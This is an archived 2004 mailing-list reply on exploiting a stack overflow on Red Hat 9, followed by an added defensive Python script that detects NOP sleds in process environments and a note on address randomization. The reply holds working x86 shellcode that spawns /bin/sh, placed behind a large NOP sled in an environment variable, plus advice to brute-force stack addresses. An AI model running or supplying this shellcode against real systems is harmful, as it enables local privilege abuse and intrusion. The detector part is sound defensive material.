On Tuesday 09 November 2004 04:09, eip_at_tampabay.rr.com wrote:
<snip>
> I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
> 9 box kernel 2.4.20-31.9. Am I doing something wrong?
no, you're not
but... RH does randomize the stack a little iirc
so, my way of doing stuff then, is just brute force it! :)
(you could also return to libc or whatever)
best way to do it (i think) is : put your shellcode in the env...
export SHELLCODE=`perl -e '{print "\x90"x65000 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
that should give you some breathing space for where to jump to...
shellcode starts (on my box) at 0xbfff0027, so everything from there to
0xbffffe00 should do fine...
--
harry
aka Rik Bobbaers
K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers@cc.kuleuven.ac.be -=- http://harry.ulyssis.org
"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
Received on Nov 10 2004
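Added example, written from the defender's side and not part of this thread or anything the poster wrote: the trick described above (a huge environment variable that is almost entirely 0x90 NOP bytes) leaves a very recognisable artifact in the target process's environment block. The script below parses an environment block in the /proc/<pid>/environ format (NUL-separated KEY=VALUE entries) and flags variables that are unusually large, dominated by the NOP byte, or containing a long unbroken NOP run. The thresholds and the sample block are assumptions constructed here; the "payload" in the sample is a plain placeholder string.

```python
NOP = 0x90
SIZE_THRESHOLD = 4096      # assumption: environment values this large are rare in normal processes
NOP_RATIO_THRESHOLD = 0.5  # assumption: more than half NOP bytes is a strong sled indicator
MIN_NOP_RUN = 64           # assumption: a run this long does not occur in ordinary text values


def parse_environ(blob: bytes) -> dict:
    """Parse a NUL-separated KEY=VALUE block, the same layout as /proc/<pid>/environ."""
    env = {}
    for entry in blob.split(b"\x00"):
        if not entry:
            continue
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("latin-1")] = value
    return env


def longest_nop_run(value: bytes) -> int:
    """Length of the longest consecutive run of 0x90 bytes in value."""
    best = cur = 0
    for b in value:
        cur = cur + 1 if b == NOP else 0
        best = max(best, cur)
    return best


def find_suspicious(env: dict) -> list:
    """Return (variable name, [reasons]) for every value that looks like a NOP sled."""
    findings = []
    for key, value in env.items():
        size = len(value)
        nops = value.count(bytes([NOP]))
        ratio = nops / size if size else 0.0
        run = longest_nop_run(value)
        reasons = []
        if size > SIZE_THRESHOLD:
            reasons.append(f"size={size}")
        if ratio > NOP_RATIO_THRESHOLD:
            reasons.append(f"nop_ratio={ratio:.2f}")
        if run >= MIN_NOP_RUN:
            reasons.append(f"nop_run={run}")
        if reasons:
            findings.append((key, reasons))
    return findings


def scan_pid(pid: int) -> list:
    """Scan a live process on Linux; only used when pointed at a real pid."""
    with open(f"/proc/{pid}/environ", "rb") as f:
        return find_suspicious(parse_environ(f.read()))


# Constructed sample: two ordinary variables plus one shaped like the SHELLCODE
# variable from the thread (65000 NOPs followed by a placeholder, not a real payload).
SAMPLE_ENVIRON = (
    b"PATH=/usr/bin:/bin\x00"
    b"HOME=/home/user\x00"
    b"SHELLCODE=" + b"\x90" * 65000 + b"PLACEHOLDER-NOT-A-PAYLOAD\x00"
)

if __name__ == "__main__":
    for key, reasons in find_suspicious(parse_environ(SAMPLE_ENVIRON)):
        print(f"suspicious variable {key}: {', '.join(reasons)}")
```

On the sample block only SHELLCODE is reported, on all three counts. Checking `scan_pid()` against running processes is one way to spot the environment-variable sled after the fact; the more direct mitigation for the brute-force approach in the thread is full address-space randomization, which on current Linux kernels is controlled by `/proc/sys/kernel/randomize_va_space` (value 2 randomizes stack, mmap and brk).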